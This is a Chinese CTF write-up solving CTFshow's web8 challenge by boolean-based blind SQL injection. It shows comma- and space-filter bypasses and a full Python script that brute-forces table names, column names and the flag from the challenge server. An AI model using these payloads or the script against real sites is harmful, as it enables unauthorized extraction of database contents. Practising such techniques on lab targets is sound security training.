刷题之旅第28站,CTFshow web8

感谢ctf show平台提供题目

打开网站，入眼看起来像sql注入。

index.php?id=0/**/or/**/1=1#

网站过滤了union 常规注入是不行了，那么进行布尔型盲注。

题目对逗号进行了过滤，那么也有绕过姿势！

' and ascii(substr((select database()),1,1))=xx #
这样的话写个脚本很容易跑出来了，过滤逗号之后可以变成这样

' and ascii(substr((select database())from 1 for 1))=xx #
这应该是substring函数的两种用法

于是构造python脚本。

for i in range(1,45):
    print(i)
    for j in range(31,128):
        payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        
        ra = s.get(url=url + '?id=0/**/or/**/' + payload).text

        if 'I asked nothing' in ra:
            table += chr(j)
            print(table)
            break

运行python脚本，得到了3张表。

继续进行猜解字段名。

payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))

获取数据

payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))

道理相同就不一 一演示了。
下面是完整代码。

import requests
s=requests.session()
url='http://124.156.121.112:28045/index.php'
table=""

for i in range(1,45):
    print(i)
    for j in range(31,128):
        #爆表名  flag
        #payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #爆字段名 flag
        #payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #读取flag
        payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))

        ra = s.get(url=url + '?id=0/**/or/**/' + payload).text

        if 'I asked nothing' in ra:
            table += chr(j)
            print(table)
            break

原创文章不易，点个赞再走吧。